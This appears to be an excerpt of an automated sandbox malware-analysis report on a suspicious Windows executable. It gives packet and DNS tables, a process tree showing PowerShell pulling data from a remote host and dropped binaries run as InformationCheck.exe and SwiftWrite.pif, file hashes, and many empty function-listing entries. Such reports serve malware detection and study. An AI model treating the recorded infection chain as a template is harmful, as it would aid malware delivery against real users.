Oct 7, 2024 21:30:05.658369064 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658380032 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658392906 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658406973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658425093 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658432007 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658437967 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658457041 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658463001 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658505917 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658514023 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658524990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658552885 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658557892 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658579111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658596039 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658601999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.658638954 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.658682108 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.837508917 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.837547064 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.837567091 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.837651014 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859457970 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859463930 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859500885 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859513044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859627962 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859636068 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859662056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859688044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859723091 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859729052 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859802961 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.859812021 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.859916925 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.010876894 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.010905981 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.010936975 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.011014938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033019066 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033047915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033086061 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033099890 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033307076 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033307076 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033318996 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033350945 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033368111 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033385038 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033397913 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033447027 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033456087 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.033473969 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.033528090 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.243410110 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.243571997 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.254591942 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.254610062 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.254638910 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.254699945 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285456896 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285485983 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285521984 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285532951 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285634995 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285646915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285664082 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285682917 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285741091 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285748005 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285763025 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285814047 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285814047 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285885096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.285891056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.285943985 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480089903 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480129004 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.480159044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.480328083 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.480328083 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499790907 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499819994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499846935 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499856949 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.499968052 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.499979973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.500009060 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:06.500030994 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.500058889 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.500111103 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:06.909497976 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:07.073082924 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:07.302570105 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 7, 2024 21:30:01.833945036 CEST | 55241 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:02.072568893 CEST | 53 | 55241 | 1.1.1.1 | 192.168.2.4 |
Oct 7, 2024 21:30:10.590367079 CEST | 64582 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:10.606520891 CEST | 53 | 64582 | 1.1.1.1 | 192.168.2.4 |
Oct 7, 2024 21:30:30.059900045 CEST | 49345 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:30.076343060 CEST | 53 | 49345 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 7, 2024 21:30:01.833945036 CEST | 192.168.2.4 | 1.1.1.1 | 0x55e8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:10.590367079 CEST | 192.168.2.4 | 1.1.1.1 | 0xf90c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:30.059900045 CEST | 192.168.2.4 | 1.1.1.1 | 0x488a | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 7, 2024 21:30:02.072568893 CEST | 1.1.1.1 | 192.168.2.4 | 0x55e8 | No error (0) | 83.140.241.4 | A (IP address) | IN (0x0001) | false | ||
Oct 7, 2024 21:30:10.606520891 CEST | 1.1.1.1 | 192.168.2.4 | 0xf90c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:30.076343060 CEST | 1.1.1.1 | 192.168.2.4 | 0x488a | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 83.140.241.4 | 443 | 7364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-07 19:30:02 UTC | 191 | OUT | |
2024-10-07 19:30:03 UTC | 395 | IN | |
2024-10-07 19:30:03 UTC | 15989 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 15:29:57 |
Start date: | 07/10/2024 |
Path: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bb120000 |
File size: | 1'974'272 bytes |
MD5 hash: | FCA042B18ADF613D9A2BE1646663698F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 15:29:58 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:29:58 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:30:06 |
Start date: | 07/10/2024 |
Path: | C:\Users\Public\InformationCheck.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x530000 |
File size: | 893'608 bytes |
MD5 hash: | C56B5F0201A3B3DE53E561FE76912BFD |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 15:30:09 |
Start date: | 07/10/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 15:30:09 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 15:30:20 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e48a0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 15:30:23 |
Start date: | 07/10/2024 |
Path: | C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8a0000 |
File size: | 893'608 bytes |
MD5 hash: | C56B5F0201A3B3DE53E561FE76912BFD |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 2.4% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 12.4% |
Total number of Nodes: | 1429 |
Total number of Limit Nodes: | 30 |
Graph
Function 00007FF6BB1237B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB126580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB141D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1BF630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB132E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB127920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB125DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB123D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB13E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB123B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1325BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB123CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB127EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1272C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB123F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1366C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15DDA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D17C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CCE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CBA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B32AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB144514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB12183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB122AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B0A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB16529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB125F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A72A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1AA350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1AA4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B0D24 Relevance: 15.1, APIs: 10, Instructions: 86clipboardmemoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B3940 Relevance: 12.1, APIs: 8, Instructions: 116networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B8360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15AF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B7E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
APIs |
|
Strings |
|
